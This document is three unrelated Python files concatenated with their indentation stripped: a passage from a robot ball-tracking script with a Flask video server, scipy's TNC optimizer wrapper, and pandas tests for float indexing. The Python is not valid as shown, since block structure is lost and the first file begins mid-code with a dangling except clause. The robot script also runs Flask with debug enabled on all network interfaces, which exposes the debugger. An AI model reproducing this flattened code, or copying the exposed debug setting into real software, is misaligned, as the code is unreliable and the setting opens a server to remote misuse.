self.board.set_pin_mode(self.MOTOR_3_A, self.board.OUTPUT, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_3_B, self.board.OUTPUT, self.board.DIGITAL)
self.dx, self.dy = 0, 0
def stop_motors(self):
self.board.digital_write(self.MOTOR_1_B, 0)
self.board.digital_write(self.MOTOR_1_A, 0)
self.board.digital_write(self.MOTOR_2_B, 0)
self.board.digital_write(self.MOTOR_2_A, 0)
self.board.digital_write(self.MOTOR_3_B, 0)
self.board.digital_write(self.MOTOR_3_A, 0)
def run(self):
while True:
# Reset all direction pins to avoid damaging H-bridges
# TODO: USE dx,dy now in (-1,1)+(None,None) range
self.stop_motors()
dist = abs(self.dx)
if dist > 0.2: #was 2
if self.dx > 0:
print("Turning left")
self.board.digital_write(self.MOTOR_1_B, 1)
self.board.digital_write(self.MOTOR_2_B, 1)
self.board.digital_write(self.MOTOR_3_B, 1)
else:
print("Turning right")
self.board.digital_write(self.MOTOR_1_A, 1)
self.board.digital_write(self.MOTOR_2_A, 1)
self.board.digital_write(self.MOTOR_3_A, 1)
self.board.analog_write(self.MOTOR_1_PWM, int(dist ** 0.7 + 25))
self.board.analog_write(self.MOTOR_2_PWM, int(dist ** 0.7 + 25))
self.board.analog_write(self.MOTOR_3_PWM, int(dist ** 0.7 + 25))
# elif self.dy > 30:
else:
print("Going forward")
self.board.digital_write(self.MOTOR_1_B, 1)
self.board.digital_write(self.MOTOR_3_A, 1)
self.board.analog_write(self.MOTOR_1_PWM, int(self.dy ** 0.5 )+30)
self.board.analog_write(self.MOTOR_2_PWM, 0)
self.board.analog_write(self.MOTOR_3_PWM, int(self.dy ** 0.5 )+30)
sleep(0.03)
except:
class Motors:
def __init__(self):
self.dx, self.dy = 0, 0
def start(self):
print("Wrooom wroom!!!! (no motors found) ")
class FrameGrabber(Thread):
def __init__(self, width=320, height=240):
Thread.__init__(self)
self.daemon = True
self.video = cv2.VideoCapture(0)
self.width,self.height = width,height
self.video.set(3, width)
self.video.set(4, height)
self.timestamp = time()
self.frames = 0
self.fps = 50
self.current_frame = self.video.read()[1]
self.ballLower = (5, 140, 140)
self.ballUpper = (30, 255, 255)
def getFrameSize(self, frame=None):
if frame==None:
return self.width,self.height
width = np.size(frame, 1)
height = np.size(frame, 0)
return width, height
def getBallDelta(self,x,y):
w,h = self.width,self.height
dx,dy = x/w, y/h
dx,dy = (dx-0.5)*2,(dy-0.5)*2
return dx,dy
def run(self):
while True:
self.frames += 1
timestamp_begin = time()
if self.frames > 10:
self.fps = self.frames / (timestamp_begin - self.timestamp)
self.frames = 0
self.timestamp = timestamp_begin
_, frame = self.video.read()
frame = cv2.flip(frame, 1)
original = frame
blurred = cv2.blur(frame, (4,4))
hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, self.ballLower, self.ballUpper)
mask = cv2.dilate(mask, None, iterations=2)
cutout = cv2.bitwise_and(frame,frame, mask= mask)
cnts = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
if cnts:
c = max(cnts, key=cv2.contourArea)
(x, y), radius = cv2.minEnclosingCircle(c)
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
if radius > 5:
cv2.circle(frame, (int(x), int(y)), int(radius), (0, 255, 255), 2)
cv2.circle(frame, center, 5, (0, 0, 255), -1)
radius = round( (1/radius)*1135, 2)
cv2.putText(original,str(radius),(int(x),int(y)), cv2.FONT_HERSHEY_SIMPLEX, 0.7,(255,255,255),1,cv2.LINE_AA)
cv2.putText(original,str(radius),(int(x+3),int(y)), cv2.FONT_HERSHEY_SIMPLEX, 0.59,(0,0,0),1,cv2.LINE_AA)
motors.dx, motors.dy = self.getBallDelta(x,y)
cv2.putText(frame,"%.01f fps" % self.fps, (10,20), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(255,255,255),1,cv2.LINE_AA)
width, height = self.getFrameSize(frame=frame)
cv2.putText(frame,str([round(motors.dx,2), round(motors.dy,2)]), (int(width*0.007),int(height*0.97)), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(255,255,255),1,cv2.LINE_AA)
self.current_frame = np.hstack([original, cutout])
motors = Motors()
grabber = FrameGrabber()
motors.start()
grabber.start()
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/nouislider.css')
def nouisliderCSS():
return render_template('nouislider.css')
@app.route('/nouislider.js')
def nouisliderJS():
return render_template('nouislider.js')
@app.route('/sliders')
def sliders():
return render_template('sliders.html')
@app.route('/video_feed')
def video_feed():
def generator():
while True:
if grabber.current_frame != None:
ret, jpeg = cv2.imencode('.jpg', grabber.current_frame, (cv2.IMWRITE_JPEG_QUALITY, 10))
yield b'--frame\r\nContent-Type: image/jpeg\r\n\r\n' + jpeg.tobytes() + b'\r\n\r\n'
sleep(0.002)
return Response(generator(),
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/camera/config', methods=['get', 'post'])
def config():
global grabber
blH = int(request.form.get('blH')) #int cant be none
blS = int(request.form.get('blS'))
blV = int(request.form.get('blV'))
bhH = int(request.form.get('bhH'))
bhS = int(request.form.get('bhS'))
bhV = int(request.form.get('bhV'))
print ("lower range is now: " , grabber.ballLower , (blH, blS, blV))
grabber.ballLower = (blH, blS, blV)
print("Higher range is now: " ,grabber.ballUpper, (bhH, bhS, bhV))
grabber.ballUpper = (bhH, bhS, bhV)
return "OK"
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True,use_reloader=False,threaded=True)
|
|
# TNC Python interface
# @(#) $Jeannot: tnc.py,v 1.11 2005/01/28 18:27:31 js Exp $
# Copyright (c) 2004-2005, Jean-Sebastien Roy ([email protected])
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
TNC: A python interface to the TNC non-linear optimizer
TNC is a non-linear optimizer. To use it, you must provide a function to
minimize. The function must take one argument: the list of coordinates where to
evaluate the function; and it must return either a tuple, whose first element is the
value of the function, and whose second argument is the gradient of the function
(as a list of values); or None, to abort the minimization.
"""
from __future__ import division, print_function, absolute_import
from numpy import inf, array, zeros, asfarray
from scipy.optimize import moduleTNC, approx_fprime
from .optimize import MemoizeJac, OptimizeResult, _check_unknown_options
__all__ = ['fmin_tnc']
MSG_NONE = 0 # No messages
MSG_ITER = 1 # One line per iteration
MSG_INFO = 2 # Informational messages
MSG_VERS = 4 # Version info
MSG_EXIT = 8 # Exit reasons
MSG_ALL = MSG_ITER + MSG_INFO + MSG_VERS + MSG_EXIT
MSGS = {
MSG_NONE: "No messages",
MSG_ITER: "One line per iteration",
MSG_INFO: "Informational messages",
MSG_VERS: "Version info",
MSG_EXIT: "Exit reasons",
MSG_ALL: "All messages"
}
INFEASIBLE = -1 # Infeasible (lower bound > upper bound)
LOCALMINIMUM = 0 # Local minimum reached (|pg| ~= 0)
FCONVERGED = 1 # Converged (|f_n-f_(n-1)| ~= 0)
XCONVERGED = 2 # Converged (|x_n-x_(n-1)| ~= 0)
MAXFUN = 3 # Max. number of function evaluations reached
LSFAIL = 4 # Linear search failed
CONSTANT = 5 # All lower bounds are equal to the upper bounds
NOPROGRESS = 6 # Unable to progress
USERABORT = 7 # User requested end of minimization
RCSTRINGS = {
INFEASIBLE: "Infeasible (lower bound > upper bound)",
LOCALMINIMUM: "Local minimum reached (|pg| ~= 0)",
FCONVERGED: "Converged (|f_n-f_(n-1)| ~= 0)",
XCONVERGED: "Converged (|x_n-x_(n-1)| ~= 0)",
MAXFUN: "Max. number of function evaluations reached",
LSFAIL: "Linear search failed",
CONSTANT: "All lower bounds are equal to the upper bounds",
NOPROGRESS: "Unable to progress",
USERABORT: "User requested end of minimization"
}
# Changes to interface made by Travis Oliphant, Apr. 2004 for inclusion in
# SciPy
def fmin_tnc(func, x0, fprime=None, args=(), approx_grad=0,
bounds=None, epsilon=1e-8, scale=None, offset=None,
messages=MSG_ALL, maxCGit=-1, maxfun=None, eta=-1,
stepmx=0, accuracy=0, fmin=0, ftol=-1, xtol=-1, pgtol=-1,
rescale=-1, disp=None, callback=None):
"""
Minimize a function with variables subject to bounds, using
gradient information in a truncated Newton algorithm. This
method wraps a C implementation of the algorithm.
Parameters
----------
func : callable ``func(x, *args)``
Function to minimize. Must do one of:
1. Return f and g, where f is the value of the function and g its
gradient (a list of floats).
2. Return the function value but supply gradient function
separately as `fprime`.
3. Return the function value and set ``approx_grad=True``.
If the function returns None, the minimization
is aborted.
x0 : array_like
Initial estimate of minimum.
fprime : callable ``fprime(x, *args)``, optional
Gradient of `func`. If None, then either `func` must return the
function value and the gradient (``f,g = func(x, *args)``)
or `approx_grad` must be True.
args : tuple, optional
Arguments to pass to function.
approx_grad : bool, optional
If true, approximate the gradient numerically.
bounds : list, optional
(min, max) pairs for each element in x0, defining the
bounds on that parameter. Use None or +/-inf for one of
min or max when there is no bound in that direction.
epsilon : float, optional
Used if approx_grad is True. The stepsize in a finite
difference approximation for fprime.
scale : array_like, optional
Scaling factors to apply to each variable. If None, the
factors are up-low for interval bounded variables and
1+|x| for the others. Defaults to None.
offset : array_like, optional
Value to subtract from each variable. If None, the
offsets are (up+low)/2 for interval bounded variables
and x for the others.
messages : int, optional
Bit mask used to select messages display during
minimization values defined in the MSGS dict. Defaults to
MGS_ALL.
disp : int, optional
Integer interface to messages. 0 = no message, 5 = all messages
maxCGit : int, optional
Maximum number of hessian*vector evaluations per main
iteration. If maxCGit == 0, the direction chosen is
-gradient if maxCGit < 0, maxCGit is set to
max(1,min(50,n/2)). Defaults to -1.
maxfun : int, optional
Maximum number of function evaluation. if None, maxfun is
set to max(100, 10*len(x0)). Defaults to None.
eta : float, optional
Severity of the line search. if < 0 or > 1, set to 0.25.
Defaults to -1.
stepmx : float, optional
Maximum step for the line search. May be increased during
call. If too small, it will be set to 10.0. Defaults to 0.
accuracy : float, optional
Relative precision for finite difference calculations. If
<= machine_precision, set to sqrt(machine_precision).
Defaults to 0.
fmin : float, optional
Minimum function value estimate. Defaults to 0.
ftol : float, optional
Precision goal for the value of f in the stoping criterion.
If ftol < 0.0, ftol is set to 0.0 defaults to -1.
xtol : float, optional
Precision goal for the value of x in the stopping
criterion (after applying x scaling factors). If xtol <
0.0, xtol is set to sqrt(machine_precision). Defaults to
-1.
pgtol : float, optional
Precision goal for the value of the projected gradient in
the stopping criterion (after applying x scaling factors).
If pgtol < 0.0, pgtol is set to 1e-2 * sqrt(accuracy).
Setting it to 0.0 is not recommended. Defaults to -1.
rescale : float, optional
Scaling factor (in log10) used to trigger f value
rescaling. If 0, rescale at each iteration. If a large
value, never rescale. If < 0, rescale is set to 1.3.
callback : callable, optional
Called after each iteration, as callback(xk), where xk is the
current parameter vector.
Returns
-------
x : ndarray
The solution.
nfeval : int
The number of function evaluations.
rc : int
Return code, see below
See also
--------
minimize: Interface to minimization algorithms for multivariate
functions. See the 'TNC' `method` in particular.
Notes
-----
The underlying algorithm is truncated Newton, also called
Newton Conjugate-Gradient. This method differs from
scipy.optimize.fmin_ncg in that
1. It wraps a C implementation of the algorithm
2. It allows each variable to be given an upper and lower bound.
The algorithm incoporates the bound constraints by determining
the descent direction as in an unconstrained truncated Newton,
but never taking a step-size large enough to leave the space
of feasible x's. The algorithm keeps track of a set of
currently active constraints, and ignores them when computing
the minimum allowable step size. (The x's associated with the
active constraint are kept fixed.) If the maximum allowable
step size is zero then a new constraint is added. At the end
of each iteration one of the constraints may be deemed no
longer active and removed. A constraint is considered
no longer active is if it is currently active
but the gradient for that variable points inward from the
constraint. The specific constraint removed is the one
associated with the variable of largest index whose
constraint is no longer active.
Return 01-codes are defined as follows::
-1 : Infeasible (lower bound > upper bound)
0 : Local minimum reached (|pg| ~= 0)
1 : Converged (|f_n-f_(n-1)| ~= 0)
2 : Converged (|x_n-x_(n-1)| ~= 0)
3 : Max. number of function evaluations reached
4 : Linear search failed
5 : All lower bounds are equal to the upper bounds
6 : Unable to progress
7 : User requested end of minimization
References
----------
Wright S., Nocedal J. (2006), 'Numerical Optimization'
Nash S.G. (1984), "Newton-Type Minimization Via the Lanczos Method",
SIAM Journal of Numerical Analysis 21, pp. 770-778
"""
# handle fprime/approx_grad
if approx_grad:
fun = func
jac = None
elif fprime is None:
fun = MemoizeJac(func)
jac = fun.derivative
else:
fun = func
jac = fprime
if disp is not None: # disp takes precedence over messages
mesg_num = disp
else:
mesg_num = {0: MSG_NONE, 1: MSG_ITER, 2: MSG_INFO, 3: MSG_VERS,
4: MSG_EXIT, 5: MSG_ALL}.get(messages, MSG_ALL)
# build options
opts = {'eps': epsilon,
'scale': scale,
'offset': offset,
'mesg_num': mesg_num,
'maxCGit': maxCGit,
'maxiter': maxfun,
'eta': eta,
'stepmx': stepmx,
'accuracy': accuracy,
'minfev': fmin,
'ftol': ftol,
'xtol': xtol,
'gtol': pgtol,
'rescale': rescale,
'disp': False}
res = _minimize_tnc(fun, x0, args, jac, bounds, callback=callback, **opts)
return res['x'], res['nfev'], res['status']
def _minimize_tnc(fun, x0, args=(), jac=None, bounds=None,
eps=1e-8, scale=None, offset=None, mesg_num=None,
maxCGit=-1, maxiter=None, eta=-1, stepmx=0, accuracy=0,
minfev=0, ftol=-1, xtol=-1, gtol=-1, rescale=-1, disp=False,
callback=None, **unknown_options):
"""
Minimize a scalar function of one or more variables using a truncated
Newton (TNC) algorithm.
Options
-------
eps : float
Step size used for numerical approximation of the jacobian.
scale : list of floats
Scaling factors to apply to each variable. If None, the
factors are up-low for interval bounded variables and
1+|x] fo the others. Defaults to None
offset : float
Value to subtract from each variable. If None, the
offsets are (up+low)/2 for interval bounded variables
and x for the others.
disp : bool
Set to True to print convergence messages.
maxCGit : int
Maximum number of hessian*vector evaluations per main
iteration. If maxCGit == 0, the direction chosen is
-gradient if maxCGit < 0, maxCGit is set to
max(1,min(50,n/2)). Defaults to -1.
maxiter : int
Maximum number of function evaluation. if None, `maxiter` is
set to max(100, 10*len(x0)). Defaults to None.
eta : float
Severity of the line search. if < 0 or > 1, set to 0.25.
Defaults to -1.
stepmx : float
Maximum step for the line search. May be increased during
call. If too small, it will be set to 10.0. Defaults to 0.
accuracy : float
Relative precision for finite difference calculations. If
<= machine_precision, set to sqrt(machine_precision).
Defaults to 0.
minfev : float
Minimum function value estimate. Defaults to 0.
ftol : float
Precision goal for the value of f in the stoping criterion.
If ftol < 0.0, ftol is set to 0.0 defaults to -1.
xtol : float
Precision goal for the value of x in the stopping
criterion (after applying x scaling factors). If xtol <
0.0, xtol is set to sqrt(machine_precision). Defaults to
-1.
gtol : float
Precision goal for the value of the projected gradient in
the stopping criterion (after applying x scaling factors).
If gtol < 0.0, gtol is set to 1e-2 * sqrt(accuracy).
Setting it to 0.0 is not recommended. Defaults to -1.
rescale : float
Scaling factor (in log10) used to trigger f value
rescaling. If 0, rescale at each iteration. If a large
value, never rescale. If < 0, rescale is set to 1.3.
"""
_check_unknown_options(unknown_options)
epsilon = eps
maxfun = maxiter
fmin = minfev
pgtol = gtol
x0 = asfarray(x0).flatten()
n = len(x0)
if bounds is None:
bounds = [(None, None)] * n
if len(bounds) != n:
raise ValueError('length of x0 != length of bounds')
if mesg_num is not None:
messages = {0: MSG_NONE, 1: MSG_ITER, 2: MSG_INFO, 3: MSG_VERS,
4: MSG_EXIT, 5: MSG_ALL}.get(mesg_num, MSG_ALL)
elif disp:
messages = MSG_ALL
else:
messages = MSG_NONE
if jac is None:
def func_and_grad(x):
f = fun(x, *args)
g = approx_fprime(x, fun, epsilon, *args)
return f, g
else:
def func_and_grad(x):
f = fun(x, *args)
g = jac(x, *args)
return f, g
"""
low, up : the bounds (lists of floats)
if low is None, the lower bounds are removed.
if up is None, the upper bounds are removed.
low and up defaults to None
"""
low = zeros(n)
up = zeros(n)
for i in range(n):
if bounds[i] is None:
l, u = -inf, inf
else:
l, u = bounds[i]
if l is None:
low[i] = -inf
else:
low[i] = l
if u is None:
up[i] = inf
else:
up[i] = u
if scale is None:
scale = array([])
if offset is None:
offset = array([])
if maxfun is None:
maxfun = max(100, 10 * len(x0))
rc, nf, nit, x = moduleTNC.minimize(func_and_grad, x0, low, up, scale,
offset, messages, maxCGit, maxfun,
eta, stepmx, accuracy, fmin, ftol,
xtol, pgtol, rescale, callback)
funv, jacv = func_and_grad(x)
return OptimizeResult(x=x, fun=funv, jac=jacv, nfev=nf, nit=nit, status=rc,
message=RCSTRINGS[rc], success=(-1 < rc < 3))
if __name__ == '__main__':
# Examples for TNC
def example():
print("Example")
# A function to minimize
def function(x):
f = pow(x[0], 2.0) + pow(abs(x[1]), 3.0)
g = [0, 0]
g[0] = 2.0 * x[0]
g[1] = 3.0 * pow(abs(x[1]), 2.0)
if x[1] < 0:
g[1] = -g[1]
return f, g
# Optimizer call
x, nf, rc = fmin_tnc(function, [-7, 3], bounds=([-10, 1], [10, 10]))
print("After", nf, "function evaluations, TNC returned:", RCSTRINGS[rc])
print("x =", x)
print("exact value = [0, 1]")
print()
example()
|
|
# -*- coding: utf-8 -*-
import pytest
from warnings import catch_warnings
import numpy as np
from pandas import Series, DataFrame, Index, Float64Index
from pandas.util.testing import assert_series_equal, assert_almost_equal
import pandas.util.testing as tm
class TestFloatIndexers(object):
def check(self, result, original, indexer, getitem):
"""
comparator for results
we need to take care if we are indexing on a
Series or a frame
"""
if isinstance(original, Series):
expected = original.iloc[indexer]
else:
if getitem:
expected = original.iloc[:, indexer]
else:
expected = original.iloc[indexer]
assert_almost_equal(result, expected)
def test_scalar_error(self):
# GH 4892
# float_indexers should raise exceptions
# on appropriate Index types & accessors
# this duplicates the code below
# but is spefically testing for the error
# message
for index in [tm.makeStringIndex, tm.makeUnicodeIndex,
tm.makeCategoricalIndex,
tm.makeDateIndex, tm.makeTimedeltaIndex,
tm.makePeriodIndex, tm.makeIntIndex,
tm.makeRangeIndex]:
i = index(5)
s = Series(np.arange(len(i)), index=i)
def f():
s.iloc[3.0]
tm.assert_raises_regex(TypeError,
'cannot do positional indexing',
f)
def f():
s.iloc[3.0] = 0
pytest.raises(TypeError, f)
def test_scalar_non_numeric(self):
# GH 4892
# float_indexers should raise exceptions
# on appropriate Index types & accessors
for index in [tm.makeStringIndex, tm.makeUnicodeIndex,
tm.makeCategoricalIndex,
tm.makeDateIndex, tm.makeTimedeltaIndex,
tm.makePeriodIndex]:
i = index(5)
for s in [Series(
np.arange(len(i)), index=i), DataFrame(
np.random.randn(
len(i), len(i)), index=i, columns=i)]:
# getting
for idxr, getitem in [(lambda x: x.ix, False),
(lambda x: x.iloc, False),
(lambda x: x, True)]:
def f():
with catch_warnings(record=True):
idxr(s)[3.0]
# gettitem on a DataFrame is a KeyError as it is indexing
# via labels on the columns
if getitem and isinstance(s, DataFrame):
error = KeyError
else:
error = TypeError
pytest.raises(error, f)
# label based can be a TypeError or KeyError
def f():
s.loc[3.0]
if s.index.inferred_type in ['string', 'unicode', 'mixed']:
error = KeyError
else:
error = TypeError
pytest.raises(error, f)
# contains
assert 3.0 not in s
# setting with a float fails with iloc
def f():
s.iloc[3.0] = 0
pytest.raises(TypeError, f)
# setting with an indexer
if s.index.inferred_type in ['categorical']:
# Value or Type Error
pass
elif s.index.inferred_type in ['datetime64', 'timedelta64',
'period']:
# these should prob work
# and are inconsisten between series/dataframe ATM
# for idxr in [lambda x: x.ix,
# lambda x: x]:
# s2 = s.copy()
# def f():
# idxr(s2)[3.0] = 0
# pytest.raises(TypeError, f)
pass
else:
s2 = s.copy()
s2.loc[3.0] = 10
assert s2.index.is_object()
for idxr in [lambda x: x.ix,
lambda x: x]:
s2 = s.copy()
with catch_warnings(record=True):
idxr(s2)[3.0] = 0
assert s2.index.is_object()
# fallsback to position selection, series only
s = Series(np.arange(len(i)), index=i)
s[3]
pytest.raises(TypeError, lambda: s[3.0])
def test_scalar_with_mixed(self):
s2 = Series([1, 2, 3], index=['a', 'b', 'c'])
s3 = Series([1, 2, 3], index=['a', 'b', 1.5])
# lookup in a pure string index
# with an invalid indexer
for idxr in [lambda x: x.ix,
lambda x: x,
lambda x: x.iloc]:
def f():
with catch_warnings(record=True):
idxr(s2)[1.0]
pytest.raises(TypeError, f)
pytest.raises(KeyError, lambda: s2.loc[1.0])
result = s2.loc['b']
expected = 2
assert result == expected
# mixed index so we have label
# indexing
for idxr in [lambda x: x.ix,
lambda x: x]:
def f():
with catch_warnings(record=True):
idxr(s3)[1.0]
pytest.raises(TypeError, f)
result = idxr(s3)[1]
expected = 2
assert result == expected
pytest.raises(TypeError, lambda: s3.iloc[1.0])
pytest.raises(KeyError, lambda: s3.loc[1.0])
result = s3.loc[1.5]
expected = 3
assert result == expected
def test_scalar_integer(self):
# test how scalar float indexers work on int indexes
# integer index
for index in [tm.makeIntIndex, tm.makeRangeIndex]:
i = index(5)
for s in [Series(np.arange(len(i))),
DataFrame(np.random.randn(len(i), len(i)),
index=i, columns=i)]:
# coerce to equal int
for idxr, getitem in [(lambda x: x.ix, False),
(lambda x: x.loc, False),
(lambda x: x, True)]:
with catch_warnings(record=True):
result = idxr(s)[3.0]
self.check(result, s, 3, getitem)
# coerce to equal int
for idxr, getitem in [(lambda x: x.ix, False),
(lambda x: x.loc, False),
(lambda x: x, True)]:
if isinstance(s, Series):
def compare(x, y):
assert x == y
expected = 100
else:
compare = tm.assert_series_equal
if getitem:
expected = Series(100,
index=range(len(s)), name=3)
else:
expected = Series(100.,
index=range(len(s)), name=3)
s2 = s.copy()
with catch_warnings(record=True):
idxr(s2)[3.0] = 100
result = idxr(s2)[3.0]
compare(result, expected)
result = idxr(s2)[3]
compare(result, expected)
# contains
# coerce to equal int
assert 3.0 in s
def test_scalar_float(self):
# scalar float indexers work on a float index
index = Index(np.arange(5.))
for s in [Series(np.arange(len(index)), index=index),
DataFrame(np.random.randn(len(index), len(index)),
index=index, columns=index)]:
# assert all operations except for iloc are ok
indexer = index[3]
for idxr, getitem in [(lambda x: x.ix, False),
(lambda x: x.loc, False),
(lambda x: x, True)]:
# getting
with catch_warnings(record=True):
result = idxr(s)[indexer]
self.check(result, s, 3, getitem)
# setting
s2 = s.copy()
def f():
with catch_warnings(record=True):
idxr(s2)[indexer] = expected
with catch_warnings(record=True):
result = idxr(s2)[indexer]
self.check(result, s, 3, getitem)
# random integer is a KeyError
with catch_warnings(record=True):
pytest.raises(KeyError, lambda: idxr(s)[3.5])
# contains
assert 3.0 in s
# iloc succeeds with an integer
expected = s.iloc[3]
s2 = s.copy()
s2.iloc[3] = expected
result = s2.iloc[3]
self.check(result, s, 3, False)
# iloc raises with a float
pytest.raises(TypeError, lambda: s.iloc[3.0])
def g():
s2.iloc[3.0] = 0
pytest.raises(TypeError, g)
def test_slice_non_numeric(self):
# GH 4892
# float_indexers should raise exceptions
# on appropriate Index types & accessors
for index in [tm.makeStringIndex, tm.makeUnicodeIndex,
tm.makeDateIndex, tm.makeTimedeltaIndex,
tm.makePeriodIndex]:
index = index(5)
for s in [Series(range(5), index=index),
DataFrame(np.random.randn(5, 2), index=index)]:
# getitem
for l in [slice(3.0, 4),
slice(3, 4.0),
slice(3.0, 4.0)]:
def f():
s.iloc[l]
pytest.raises(TypeError, f)
for idxr in [lambda x: x.ix,
lambda x: x.loc,
lambda x: x.iloc,
lambda x: x]:
def f():
with catch_warnings(record=True):
idxr(s)[l]
pytest.raises(TypeError, f)
# setitem
for l in [slice(3.0, 4),
slice(3, 4.0),
slice(3.0, 4.0)]:
def f():
s.iloc[l] = 0
pytest.raises(TypeError, f)
for idxr in [lambda x: x.ix,
lambda x: x.loc,
lambda x: x.iloc,
lambda x: x]:
def f():
with catch_warnings(record=True):
idxr(s)[l] = 0
pytest.raises(TypeError, f)
def test_slice_integer(self):
# same as above, but for Integer based indexes
# these coerce to a like integer
# oob indiciates if we are out of bounds
# of positional indexing
for index, oob in [(tm.makeIntIndex(5), False),
(tm.makeRangeIndex(5), False),
(tm.makeIntIndex(5) + 10, True)]:
# s is an in-range index
s = Series(range(5), index=index)
# getitem
for l in [slice(3.0, 4),
slice(3, 4.0),
slice(3.0, 4.0)]:
for idxr in [lambda x: x.loc,
lambda x: x.ix]:
with catch_warnings(record=True):
result = idxr(s)[l]
# these are all label indexing
# except getitem which is positional
# empty
if oob:
indexer = slice(0, 0)
else:
indexer = slice(3, 5)
self.check(result, s, indexer, False)
# positional indexing
def f():
s[l]
pytest.raises(TypeError, f)
# getitem out-of-bounds
for l in [slice(-6, 6),
slice(-6.0, 6.0)]:
for idxr in [lambda x: x.loc,
lambda x: x.ix]:
with catch_warnings(record=True):
result = idxr(s)[l]
# these are all label indexing
# except getitem which is positional
# empty
if oob:
indexer = slice(0, 0)
else:
indexer = slice(-6, 6)
self.check(result, s, indexer, False)
# positional indexing
def f():
s[slice(-6.0, 6.0)]
pytest.raises(TypeError, f)
# getitem odd floats
for l, res1 in [(slice(2.5, 4), slice(3, 5)),
(slice(2, 3.5), slice(2, 4)),
(slice(2.5, 3.5), slice(3, 4))]:
for idxr in [lambda x: x.loc,
lambda x: x.ix]:
with catch_warnings(record=True):
result = idxr(s)[l]
if oob:
res = slice(0, 0)
else:
res = res1
self.check(result, s, res, False)
# positional indexing
def f():
s[l]
pytest.raises(TypeError, f)
# setitem
for l in [slice(3.0, 4),
slice(3, 4.0),
slice(3.0, 4.0)]:
for idxr in [lambda x: x.loc,
lambda x: x.ix]:
sc = s.copy()
with catch_warnings(record=True):
idxr(sc)[l] = 0
result = idxr(sc)[l].values.ravel()
assert (result == 0).all()
# positional indexing
def f():
s[l] = 0
pytest.raises(TypeError, f)
def test_integer_positional_indexing(self):
""" make sure that we are raising on positional indexing
w.r.t. an integer index """
s = Series(range(2, 6), index=range(2, 6))
result = s[2:4]
expected = s.iloc[2:4]
assert_series_equal(result, expected)
for idxr in [lambda x: x,
lambda x: x.iloc]:
for l in [slice(2, 4.0),
slice(2.0, 4),
slice(2.0, 4.0)]:
def f():
idxr(s)[l]
pytest.raises(TypeError, f)
def test_slice_integer_frame_getitem(self):
# similar to above, but on the getitem dim (of a DataFrame)
for index in [tm.makeIntIndex, tm.makeRangeIndex]:
index = index(5)
s = DataFrame(np.random.randn(5, 2), index=index)
for idxr in [lambda x: x.loc,
lambda x: x.ix]:
# getitem
for l in [slice(0.0, 1),
slice(0, 1.0),
slice(0.0, 1.0)]:
with catch_warnings(record=True):
result = idxr(s)[l]
indexer = slice(0, 2)
self.check(result, s, indexer, False)
# positional indexing
def f():
s[l]
pytest.raises(TypeError, f)
# getitem out-of-bounds
for l in [slice(-10, 10),
slice(-10.0, 10.0)]:
result = idxr(s)[l]
self.check(result, s, slice(-10, 10), True)
# positional indexing
def f():
s[slice(-10.0, 10.0)]
pytest.raises(TypeError, f)
# getitem odd floats
for l, res in [(slice(0.5, 1), slice(1, 2)),
(slice(0, 0.5), slice(0, 1)),
(slice(0.5, 1.5), slice(1, 2))]:
with catch_warnings(record=True):
result = idxr(s)[l]
self.check(result, s, res, False)
# positional indexing
def f():
s[l]
pytest.raises(TypeError, f)
# setitem
for l in [slice(3.0, 4),
slice(3, 4.0),
slice(3.0, 4.0)]:
sc = s.copy()
with catch_warnings(record=True):
idxr(sc)[l] = 0
result = idxr(sc)[l].values.ravel()
assert (result == 0).all()
# positional indexing
def f():
s[l] = 0
pytest.raises(TypeError, f)
def test_slice_float(self):
# same as above, but for floats
index = Index(np.arange(5.)) + 0.1
for s in [Series(range(5), index=index),
DataFrame(np.random.randn(5, 2), index=index)]:
for l in [slice(3.0, 4),
slice(3, 4.0),
slice(3.0, 4.0)]:
expected = s.iloc[3:4]
for idxr in [lambda x: x.ix,
lambda x: x.loc,
lambda x: x]:
# getitem
with catch_warnings(record=True):
result = idxr(s)[l]
if isinstance(s, Series):
tm.assert_series_equal(result, expected)
else:
tm.assert_frame_equal(result, expected)
# setitem
s2 = s.copy()
with catch_warnings(record=True):
idxr(s2)[l] = 0
result = idxr(s2)[l].values.ravel()
assert (result == 0).all()
def test_floating_index_doc_example(self):
index = Index([1.5, 2, 3, 4.5, 5])
s = Series(range(5), index=index)
assert s[3] == 2
assert s.loc[3] == 2
assert s.loc[3] == 2
assert s.iloc[3] == 3
def test_floating_misc(self):
# related 236
# scalar/slicing of a float index
s = Series(np.arange(5), index=np.arange(5) * 2.5, dtype=np.int64)
# label based slicing
result1 = s[1.0:3.0]
result2 = s.loc[1.0:3.0]
result3 = s.loc[1.0:3.0]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
# exact indexing when found
result1 = s[5.0]
result2 = s.loc[5.0]
result3 = s.loc[5.0]
assert result1 == result2
assert result1 == result3
result1 = s[5]
result2 = s.loc[5]
result3 = s.loc[5]
assert result1 == result2
assert result1 == result3
assert s[5.0] == s[5]
# value not found (and no fallbacking at all)
# scalar integers
pytest.raises(KeyError, lambda: s.loc[4])
